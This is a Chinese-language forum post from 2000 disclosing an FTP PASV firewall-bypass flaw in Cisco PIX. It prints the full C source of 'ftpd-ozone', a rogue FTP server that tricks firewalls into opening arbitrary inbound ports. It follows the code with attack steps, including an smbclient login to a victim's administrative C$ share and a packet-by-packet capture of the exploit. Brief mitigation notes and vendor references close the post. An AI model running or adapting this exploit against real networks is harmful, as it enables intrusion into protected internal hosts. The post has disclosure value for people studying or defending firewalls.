发信人: netcc()
整理人: ciert(2000-03-21 18:26:57), 站内信件
|
Cisco PIX 一样存在FTP-Pasv漏洞。如果FTP server接收到像合法的"227 (xxx,
xxx,xxx,xx,prt,prt)
回应而被欺骗,将会开发内部到DMZ FTP服务器的连接端口。这个问题主要由于P
IX的'fixup protocol ftp'
引起,不能提供足够的PASV模式连接校验,就通过firewall创建一个动态的端口
。有几种方法可以通过让
FTP服务器产生特殊的数据包而使PIX处于不稳定的情况下。
PIX在版本4.4(4)的软件上测试通过。其它版本可能存在该漏洞,未经测试。
漏洞检测程序如下:
/*
ftpd-ozone.c
Demonstrate the FTP reverse firewall penetration technique
outlined by Mikael Olsson, EnterNet Sweden AB.
Tested against Netscape, Microsoft IE, Lynx, Wget. YMMV.
Copyright (c) 2000 Dug Song <[email protected]>
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <arpa/telnet.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#define WINDOW_LEN 42
#define FTPD_PORT 21
#define GREEN "\033[0m\033[01m\033[32m"
#define OFF "\033[0m"
#define int_ntoa(x) (inet_ntoa(*(struct in_addr *)&x))
void
usage(void)
{
fprintf(stderr, "Usage: ftpd-ozone [-w win] <ftp-client> <port-to-op
en>\n");
exit(1);
}
/* Strip telnet options, as well as suboption data. */
int
strip_telopts(u_char *buf, int len)
{
int i, j, subopt = 0;
char *p;
for (i = j = 0; i < len; i++) {
if (buf[i] == IAC) {
if (++i >= len) break;
else if (buf[i] > SB)
i++;
else if (buf[i] == SB) {
p = buf + i + 1;
subopt = 1;
}
else if (buf[i] == SE) {
if (!subopt) j = 0;
subopt = 0;
}
}
else if (!subopt) {
/* XXX - convert isolated carriage returns to newlines. */
if (buf[i] == '\r' && i + 1 < len && buf[i + 1] != '\n')
buf[j++] = '\n';
/* XXX - strip binary nulls. */
else if (buf[i] != '\0')
buf[j++] = buf[i];
}
}
buf[j] = '\0';
return (j);
}
u_long
resolve_host(char *host)
{
u_long addr;
struct hostent *hp;
if (host == NULL) return (0);
if ((addr = inet_addr(host)) == -1) {
if ((hp = gethostbyname(host)) == NULL)
return (0);
memcpy((char *)&addr, hp->h_addr, sizeof(addr));
}
return (addr);
}
#define UC(b) (((int)b)&0xff)
int
portnum2str(char *buf, int size, u_long ip, u_short port)
{
char *p, *q;
port = htons(port);
p = (char *)&ip;
q = (char *)&port;
return (snprintf(buf, size, "%d,%d,%d,%d,%d,%d",
UC(p[0]), UC(p[1]), UC(p[2]), UC(p[3]),
UC(q[0]), UC(q[1])));
}
int
portstr2num(char *str, u_long *dst, u_short *dport)
{
int a0, a1, a2, a3, p0, p1;
char *a, *p;
if (str[0] == '(') str++;
strtok(str, ")\r\n");
if (sscanf(str, "%d,%d,%d,%d,%d,%d", &a0, &a1, &a2, &a3, &p0, &p1) !
= 6)
return (-1);
a = (char *)dst;
a[0] = a0 & 0xff; a[1] = a1 & 0xff; a[2] = a2 & 0xff; a[3] = a3 & 0x
ff;
p = (char *)dport;
p[0] = p0 & 0xff; p[1] = p1 & 0xff;
*dport = ntohs(*dport);
return (0);
}
void
print_urls(u_long dst, u_short dport, int win)
{
char *p, host[128], tmp[128];
u_long ip;
gethostname(host, sizeof(host));
ip = resolve_host(host);
strncpy(host, int_ntoa(ip), sizeof(host));
/* XXX - "MDTM /\r\n" for Netscape, "CWD /\r\n" for MSIE. i suk. */
win -= (4 + 2 + 2);
p = malloc(win + 1);
memset(p, 'a', win);
p[win] = '\0';
portnum2str(tmp, sizeof(tmp), dst, dport);
printf("Netscape / Lynx URL to send client at %s:\n"
"ftp://%s/%s%%0a%%0dPORT%%20%s\n",
int_ntoa(dst), host, p, tmp);
printf("MSIE / Wget URL to send client at %s:\n"
"ftp://%s/a%s%%0a%%0dPORT%%20%s\n",
int_ntoa(dst), host, p, tmp);
free(p);
}
int
init_ftpd(int port, int win)
{
int fd, i = 1;
struct sockaddr_in sin;
if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
return (-1);
if (setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, &i, sizeof(i)) == -1)
return (-1);
if (setsockopt(fd, SOL_SOCKET, SO_RCVBUF, &win, sizeof(win)) == -1)
return (-1);
memset(&sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = htonl(INADDR_ANY);
sin.sin_port = htons(port);
if (bind(fd, (struct sockaddr *)&sin, sizeof(sin)) == -1)
return (-1);
if (listen(fd, 10) == -1)
return (-1);
return (fd);
}
void
do_ftpd(int fd, u_long dst, u_short dport)
{
FILE *f;
char buf[1024];
int len, portcmd = 0;
u_long ip;
u_short port;
if ((f = fdopen(fd, "r+")) == NULL)
return;
fprintf(f, "220 ftpd-ozone ready for love.\r\n");
while (fgets(buf, sizeof(buf), f) != NULL) {
if ((len = strip_telopts(buf, strlen(buf))) == 0)
continue;
if (strncasecmp(buf, "SYST", 4) == 0) {
fprintf(f, "215 ftpd-ozone\r\n");
}
else if (strncasecmp(buf, "USER ", 5) == 0) {
fprintf(f, "331 yo there\r\n");
}
else if (strncasecmp(buf, "PASS ", 5) == 0) {
fprintf(f, "230 sucker\r\n");
}
else if (strncasecmp(buf, "PWD", 3) == 0) {
fprintf(f, "257 \"/\" is current directory\r\n");
}
else if (strncasecmp(buf, "PASV", 4) == 0) {
fprintf(f, "502 try PORT instead ;-)\r\n");
/*fprintf(f, "425 try PORT instead ;-)\r\n");*/
}
else if (strncasecmp(buf, "PORT ", 5) == 0) {
if (portstr2num(buf + 5, &ip, &port) != 0)
fprintf(f, "500 you suk\r\n");
else {
fprintf(f, "200 ready for love\r\n");
if (portcmd++ < 2) /* XXX */
printf(GREEN "try connecting to %s %d" OFF "\n", int_ntoa(ip), port
);
}
}
else if (strncasecmp(buf, "CWD ", 4) == 0 ||
strncasecmp(buf, "TYPE ", 5) == 0) {
fprintf(f, "200 whatever\r\n");
}
else if (strncasecmp(buf, "NLST", 4) == 0) {
fprintf(f, "550 you suk\r\n");
}
else if (strncasecmp(buf, "MDTM ", 5) == 0) {
fprintf(f, "213 19960319165527\r\n");
}
else if (strncasecmp(buf, "RETR ", 5) == 0 ||
strncasecmp(buf, "LIST", 4) == 0) {
fprintf(f, "150 walking thru your firewall\r\n");
}
else if (strncasecmp(buf, "QUIT", 4) == 0) {
fprintf(f, "221 l8r\r\n");
break;
}
else fprintf(f, "502 i suk\r\n");
}
fclose(f);
}
int
main(int argc, char *argv[])
{
int c, sfd, cfd;
u_long dst;
u_short dport, win = WINDOW_LEN;
struct sockaddr_in sin;
while ((c = getopt(argc, argv, "w:h?")) != -1) {
switch (c) {
case 'w':
if ((win = atoi(optarg)) == 0)
usage();
break;
default:
usage();
}
}
argc -= optind;
argv += optind;
if (argc != 2)
usage();
if ((dst = resolve_host(argv[0])) == 0)
usage();
if ((dport = atoi(argv[1])) == 0)
usage();
if ((sfd = init_ftpd(FTPD_PORT, win)) == -1) {
perror("init_ftpd");
exit(1);
}
print_urls(dst, dport, win);
for (;;) {
c = sizeof(sin);
if ((cfd = accept(sfd, (struct sockaddr *)&sin, &c)) == -1) {
perror("accept");
exit(1);
}
printf("connection from %s\n", inet_ntoa(sin.sin_addr));
if (fork() == 0) {
close(sfd);
do_ftpd(cfd, dst, dport);
close(cfd);
exit(0);
}
close(cfd);
}
exit(0);
}
/* w00w00! */
首先在linux机器上编译ftp-ozone.c文件,得到执行文件ftp-ozone。
然后,如下所示:
[root@ix ftp-atk]# ./ftp-ozone 10.1.2.3 139
220 victim Microsoft FTP Service (Version 4.0).
Garbage packet contains:
500 '.................................................................
..........................................................
Money packet contains:
227 (10,1,2,3,0,139)': command not understood
-------------和打开的端口建立连接(NBT),用linux下面的smbclient命令,格
式如下-------
[root@ix ftp-atk]# smbclient \\\\VICTIM\\c$ -I 10.1.2.3 -U administrat
or
Added interface ip=127.0.0.1 bcast=127.255.255.255 nmask=255.0.0.0
Password: ********
Domain=[VICTIM] OS=[Windows NT 4.0] Server=[NT LAN Manager 4.0]
smb: \> dir
AUTOEXEC.BAT A 0 Mon Mar 13 03:22:58 2
000
boot.ini ASR 279 Mon Mar 13 03:15:07 2
000
CONFIG.SYS A 0 Mon Mar 13 03:22:58 2
000
IO.SYS AHSR 0 Mon Mar 13 03:22:58 2
000
MSDOS.SYS AHSR 0 Mon Mar 13 03:22:58 2
000
MSSCE D 0 Tue Mar 7 14:29:57 2
000
NTDETECT.COM AHSR 26816 Tue Mar 7 11:47:49 2
000
ntldr AHSR 156496 Tue Mar 7 11:47:49 2
000
pagefile.sys A1073741824 Tue Mar 7 11:51:51
2000
Program Files D 0 Tue Mar 7 11:35:11 2
000
RECYCLER DHS 0 Mon Mar 13 09:35:51 2
000
TEMP DA 0 Tue Mar 7 14:36:31 2
000
WINNT D 0 Tue Mar 7 14:30:05 2
000
64706 blocks of size 65536. 43841 blocks available
smb: \> quit
从上面的数据可以看出;通过ftp-ozone传回的从FTP服务器产生的巧妙的数据包之
后,就可以连接到
NBT(tcp/139)服务和接入一个共享。
在PIX上面用'logging console debug'设置,将显示为:
302001: Built inbound TCP connection 202 for faddr 10.1.2.4/1139 gaddr
10.1.2.3/21 laddr 192.168.205.2/21
下面是通过tcpdump -w截获的数据包解码后的文件。
--------ozone-vs-pix.decode文件如下-------------
Packet 1
Timestamp: 15:02:37.130283
Source Ethernet Address: 00:50:04:28:FE:EB
Destination Ethernet Address: 00:D0:B7:0E:18:AB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 60 bytes
Identification: 0x04CF
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 64
Encapsulated Protocol: TCP
Header Checksum: 0x1D4C
Source IP Address: 10.1.2.4
Destination IP Address: 10.1.2.3
TCP Header
Source Port: 1139 (<unknown>)
Destination Port: 21 (ftp)
Sequence Number: 1818403974
Acknowledgement Number: 0000000000
Header Length: 40 bytes (data=0)
Flags: URG=off, ACK=off, PSH=off
RST=off, SYN=on, FIN=off
Window Advertisement: 128 bytes
Checksum: 0x78CB
Urgent Pointer: 0
<Options not displayed>
TCP Data
<No data>
-----------------------------------------------------------------
Packet 2
Timestamp: 15:02:37.130720
Source Ethernet Address: 00:D0:B7:0E:18:AB
Destination Ethernet Address: 00:50:04:28:FE:EB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 44 bytes
Identification: 0x4311
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 128
Encapsulated Protocol: TCP
Header Checksum: 0x9F19
Source IP Address: 10.1.2.3
Destination IP Address: 10.1.2.4
TCP Header
Source Port: 21 (ftp)
Destination Port: 1139 (<unknown>)
Sequence Number: 1212576390
Acknowledgement Number: 1818403975
Header Length: 24 bytes (data=0)
Flags: URG=off, ACK=on, PSH=off
RST=off, SYN=on, FIN=off
Window Advertisement: 8760 bytes
Checksum: 0x8CFE
Urgent Pointer: 0
<Options not displayed>
TCP Data
<No data>
-----------------------------------------------------------------
Packet 3
Timestamp: 15:02:37.130765
Source Ethernet Address: 00:50:04:28:FE:EB
Destination Ethernet Address: 00:D0:B7:0E:18:AB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 40 bytes
Identification: 0x04D0
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 64
Encapsulated Protocol: TCP
Header Checksum: 0x1D5F
Source IP Address: 10.1.2.4
Destination IP Address: 10.1.2.3
TCP Header
Source Port: 1139 (<unknown>)
Destination Port: 21 (ftp)
Sequence Number: 1818403975
Acknowledgement Number: 1212576391
Header Length: 20 bytes (data=0)
Flags: URG=off, ACK=on, PSH=off
RST=off, SYN=off, FIN=off
Window Advertisement: 128 bytes
Checksum: 0xC673
Urgent Pointer: 0
TCP Data
<No data>
-----------------------------------------------------------------
Packet 4
Timestamp: 15:02:37.131178
Source Ethernet Address: 00:D0:B7:0E:18:AB
Destination Ethernet Address: 00:50:04:28:FE:EB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 88 bytes
Identification: 0x4411
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 128
Encapsulated Protocol: TCP
Header Checksum: 0x9DED
Source IP Address: 10.1.2.3
Destination IP Address: 10.1.2.4
TCP Header
Source Port: 21 (ftp)
Destination Port: 1139 (<unknown>)
Sequence Number: 1212576391
Acknowledgement Number: 1818403975
Header Length: 20 bytes (data=48)
Flags: URG=off, ACK=on, PSH=on
RST=off, SYN=off, FIN=off
Window Advertisement: 8760 bytes
Checksum: 0x0458
Urgent Pointer: 0
TCP Data
220 wapp2 Microsoft FTP Service (Version 4.0)..
-----------------------------------------------------------------
Packet 5
Timestamp: 15:02:37.131204
Source Ethernet Address: 00:50:04:28:FE:EB
Destination Ethernet Address: 00:D0:B7:0E:18:AB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 40 bytes
Identification: 0x04D1
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 64
Encapsulated Protocol: TCP
Header Checksum: 0x1D5E
Source IP Address: 10.1.2.4
Destination IP Address: 10.1.2.3
TCP Header
Source Port: 1139 (<unknown>)
Destination Port: 21 (ftp)
Sequence Number: 1818403975
Acknowledgement Number: 1212576439
Header Length: 20 bytes (data=0)
Flags: URG=off, ACK=on, PSH=off
RST=off, SYN=off, FIN=off
Window Advertisement: 80 bytes
Checksum: 0xC673
Urgent Pointer: 0
TCP Data
<No data>
-----------------------------------------------------------------
Packet 6
Timestamp: 15:02:47.126818
Source Ethernet Address: 00:50:04:28:FE:EB
Destination Ethernet Address: 00:D0:B7:0E:18:AB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 163 bytes
Identification: 0x04D2
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 64
Encapsulated Protocol: TCP
Header Checksum: 0x1CE2
Source IP Address: 10.1.2.4
Destination IP Address: 10.1.2.3
TCP Header
Source Port: 1139 (<unknown>)
Destination Port: 21 (ftp)
Sequence Number: 1818403975
Acknowledgement Number: 1212576439
Header Length: 20 bytes (data=123)
Flags: URG=off, ACK=on, PSH=on
RST=off, SYN=off, FIN=off
Window Advertisement: 128 bytes
Checksum: 0x96BF
Urgent Pointer: 0
TCP Data
.....................................................................
......................................................
-----------------------------------------------------------------
Packet 7
Timestamp: 15:02:47.248131
Source Ethernet Address: 00:D0:B7:0E:18:AB
Destination Ethernet Address: 00:50:04:28:FE:EB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 40 bytes
Identification: 0x4511
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 128
Encapsulated Protocol: TCP
Header Checksum: 0x9D1D
Source IP Address: 10.1.2.3
Destination IP Address: 10.1.2.4
TCP Header
Source Port: 21 (ftp)
Destination Port: 1139 (<unknown>)
Sequence Number: 1212576439
Acknowledgement Number: 1818404098
Header Length: 20 bytes (data=0)
Flags: URG=off, ACK=on, PSH=off
RST=off, SYN=off, FIN=off
Window Advertisement: 8637 bytes
Checksum: 0xA48B
Urgent Pointer: 0
TCP Data
<No data>
-----------------------------------------------------------------
Packet 8
Timestamp: 15:02:47.248184
Source Ethernet Address: 00:50:04:28:FE:EB
Destination Ethernet Address: 00:D0:B7:0E:18:AB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 69 bytes
Identification: 0x04D3
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 64
Encapsulated Protocol: TCP
Header Checksum: 0x1D3F
Source IP Address: 10.1.2.4
Destination IP Address: 10.1.2.3
TCP Header
Source Port: 1139 (<unknown>)
Destination Port: 21 (ftp)
Sequence Number: 1818404098
Acknowledgement Number: 1212576439
Header Length: 20 bytes (data=29)
Flags: URG=off, ACK=on, PSH=on
RST=off, SYN=off, FIN=off
Window Advertisement: 128 bytes
Checksum: 0x2602
Urgent Pointer: 0
TCP Data
227 (10,1,2,3,0,139).
-----------------------------------------------------------------
Packet 9
Timestamp: 15:02:47.248558
Source Ethernet Address: 00:D0:B7:0E:18:AB
Destination Ethernet Address: 00:50:04:28:FE:EB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 168 bytes
Identification: 0x4611
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 128
Encapsulated Protocol: TCP
Header Checksum: 0x9B9D
Source IP Address: 10.1.2.3
Destination IP Address: 10.1.2.4
TCP Header
Source Port: 21 (ftp)
Destination Port: 1139 (<unknown>)
Sequence Number: 1212576439
Acknowledgement Number: 1818404127
Header Length: 20 bytes (data=128)
Flags: URG=off, ACK=on, PSH=off
RST=off, SYN=off, FIN=off
Window Advertisement: 8608 bytes
Checksum: 0x168C
Urgent Pointer: 0
TCP Data
500 '................................................................
...........................................................
-----------------------------------------------------------------
Packet 10
Timestamp: 15:02:47.248599
Source Ethernet Address: 00:50:04:28:FE:EB
Destination Ethernet Address: 00:D0:B7:0E:18:AB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 40 bytes
Identification: 0x04D4
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 64
Encapsulated Protocol: TCP
Header Checksum: 0x1D5B
Source IP Address: 10.1.2.4
Destination IP Address: 10.1.2.3
TCP Header
Source Port: 1139 (<unknown>)
Destination Port: 21 (ftp)
Sequence Number: 1818404127
Acknowledgement Number: 1212576567
Header Length: 20 bytes (data=0)
Flags: URG=off, ACK=on, PSH=off
RST=off, SYN=off, FIN=off
Window Advertisement: 128 bytes
Checksum: 0xC52B
Urgent Pointer: 0
TCP Data
<No data>
-----------------------------------------------------------------
Packet 11
Timestamp: 15:02:47.248836
Source Ethernet Address: 00:D0:B7:0E:18:AB
Destination Ethernet Address: 00:50:04:28:FE:EB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 94 bytes
Identification: 0x4711
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 128
Encapsulated Protocol: TCP
Header Checksum: 0x9AE7
Source IP Address: 10.1.2.3
Destination IP Address: 10.1.2.4
TCP Header
Source Port: 21 (ftp)
Destination Port: 1139 (<unknown>)
Sequence Number: 1212576567
Acknowledgement Number: 1818404127
Header Length: 20 bytes (data=54)
Flags: URG=off, ACK=on, PSH=on
RST=off, SYN=off, FIN=off
Window Advertisement: 8608 bytes
Checksum: 0x1DD1
Urgent Pointer: 0
TCP Data
227 (10,1,2,3,0,139)': command not understood.
-----------------------------------------------------------------
Packet 12
Timestamp: 15:02:47.266742
Source Ethernet Address: 00:50:04:28:FE:EB
Destination Ethernet Address: 00:D0:B7:0E:18:AB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 40 bytes
Identification: 0x04D5
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 64
Encapsulated Protocol: TCP
Header Checksum: 0x1D5A
Source IP Address: 10.1.2.4
Destination IP Address: 10.1.2.3
TCP Header
Source Port: 1139 (<unknown>)
Destination Port: 21 (ftp)
Sequence Number: 1818404127
Acknowledgement Number: 1212576621
Header Length: 20 bytes (data=0)
Flags: URG=off, ACK=on, PSH=off
RST=off, SYN=off, FIN=off
Window Advertisement: 128 bytes
Checksum: 0xC4F5
Urgent Pointer: 0
TCP Data
<No data>
----------------------------------------
IP地址对应如下:
攻击者IP=10.1.2.4, 被攻击的NAT=10.1.2.3,
被攻击真是地址=192.168.205.2(在解码文件中没能显示出来)
PIX显然在10.1.2.4和192.168.2.2之间。
在解码的数据包文件的11号包中,在TCP数据段上, 可以看出PIX的不安全性。
"227 (10,1,2,3,0,139)': command not understood."
在数据包的开头部分如果以"227 (xxx,xxx,xxx,xxx,prt,prt)"显示出来,PIX就
会创造一个动态的PASV管道。
原理基本和Firewall-1该漏洞的原理一样,但有下面几点不同。
1. 对已经打开的端口可以直接进行连接。
2. 任意端口都可能被打开,包括1024以下的端口和已知服务的端口。 This
could be worked around with a conduit ACL using explicit denies on
the
external interface.
3. 'fixup protocol ftp'可能是导致PIX该问题的主要原因。如果禁止了该“ft
p修复协议”,上述方法将
不能用了。但是由于禁止了'fixup protocol ftp',那么就存在下面两个问
题:
内部到外部的ftp连接将采用PASV模式。
外面到内部的ftp连接不能用PASV模式。
参考连接:
---------------
Firewall-1 具体漏洞描述及其解决:
http://www.securityfocus.com/vdb/bottom.html?vid=979
Checkpoint补丁极其修复问题:
http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-0
2-8&[email protected]
Checkpoint补丁包:
http://www.checkpoint.com/techsupport/alerts/pasvftp.html
--
我思念的城市已是黄昏
为何我总是对你一网情深!
※ 来源:.月光软件站 http://www.moon-soft.com.[FROM: 210.75.33.246]
|
|